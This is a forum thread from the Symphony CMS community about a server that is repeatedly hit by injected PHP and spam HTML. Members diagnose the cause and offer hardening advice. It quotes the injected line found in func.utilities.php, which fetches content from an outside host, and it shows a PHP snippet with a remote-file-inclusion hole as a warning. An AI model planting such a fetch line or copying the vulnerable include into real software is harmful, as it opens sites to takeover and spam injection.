Search

Within the past month someone has managed to inject files, including PHP scripts and HTML spam onto our server. Our server is secure. There is a hole somewhere because this keeps happening.

What version of Symphony are you using? If you are using 1.7, take a look at this, previous post in the Archived Forum.

i am using the newest version, we just upgraded and launched with the newest symphony a week ago. there was a security flaw in 1.7 too. We had this problem with the last version toward the end of its life-cycle.

This time it looks like they’ve used an file upload field to upload a zip file and a encrypted php file.

It bothers me more because we’re using the Google Search Engine extension to search the site and it’s embarrassing when the client asks me why when they search “graduation” they get results for Viagra.

(since no bookmark button, a short reply for filter) please do keep me posted

@iPOTS - just curious, do you have a file upload field on the front-end or are they slipping through the back-end? I had a similar situation with some 1.7 sites I had in the past.

no file upload via the front end.

But there is a file upload form on the backend? Is that from a symphony extension?

Perhaps the best thing in this situation would be to send a detailed report of what you think is going on to Allen and Alistair. If you can get hold of server logs for the time period in question, and any IP addresses or additional information, those would be useful too.

Do you have any scripts in addition to Symphony?

@davethegr8 Yes. but nothing third-party. I’ll try and gather more information.

@iPots: Please contact Alistair as soon as possible. (He might ask you for full access to your site to do his own research.)

If there is indeed a problem in the core (or in an extension), this is important for all of us.

Which extenstion is this? I’m pretty sure that I know what happened. If this is the FileManager, you also need to let Alistair know ASAP.

@davethegr8 - No, we are using any extensions that add any upload functionality.

@michael-e - I agree, i’ve already notified Alistair about the situation.

It sounds to me like Symphony is not the culprit here. If you don’t have any Symphony extensions that upload files, then it’s not possible that this would be caused by Symphony.

It’s more likely that you have another script on your site somewhere that is allowing an anonymous user to POST a request with a url as a file, and that script downloads that file from the attacker’s server. For example, I know of a popular javascript-based RTE that allows this.

The simplest way to secure this vulnerability is to change allow_url_fopen to 0 in PHP’s ini settings. That can be done directly in php.ini.

http://us.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen

Moreover, if you have scripts that do something like this:

http://example.com/page.php?page=home

<?php
if($_GET["page"]) {
    include($_GET["page"]);
}
?>

You are further at risk because someone can pass a url as the page parameter and PHP will happily run whatever php code is located in that remote file.

And honestly, if either of these things has happened, then your server is definitely NOT secure (it has allowed arbitrary code execution), and should be wiped.

If you have an openID, you can read more about what to do after a server is compromised here. You need a password to get into the beta, but it’s in a blog post on the same site. If you don’t have an OID, check out this doc: http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

Update: We had another injection attack this time, HTML was injected into func.utilities.php. Rackspace is pointing fingers at Symphony, Symphony pointing fingers at Rackspace.

iPOTS are you able to send as much as you know to the core team (Contact link on the footer) as a matter of urgency?

Yes, please send us as much information as possible. If you could, please provide us with FTP detail and access to the Symphony admin.

Will do.

Just an update. We did a top line investigation of the site and found no evidence that the vulnerability was caused by Symphony. We will be doing a more comprehensive investigation, pending some more info from iPOTS.

Ok, i am not pointing any fingers. I don’t know if it’s the CMS or if it’s the host but the injection attacks keep happening. I’ve emailed you the code that was injected. There is a problem somewhere whether it’s the host or not I need some input to correct this situation and prevent it from happening anymore.

The newest infected file was func.utilities.php with this code at the very bottom:

@ printf (file_get_contents(‘http://applerepairneworleans.com/baks.txt’));

I’ve since removed it for obvious reasons.

Thank for looking into the situation hopefully we’ll stumble upon the problem.

Create an account or sign in to comment.

Symphony • Open Source XSLT CMS

Server Requirements

  • PHP 5.3-5.6 or 7.0-7.3
  • PHP's LibXML module, with the XSLT extension enabled (--with-xsl)
  • MySQL 5.5 or above
  • An Apache or Litespeed webserver
  • Apache's mod_rewrite module or equivalent

Compatible Hosts

Sign in

Login details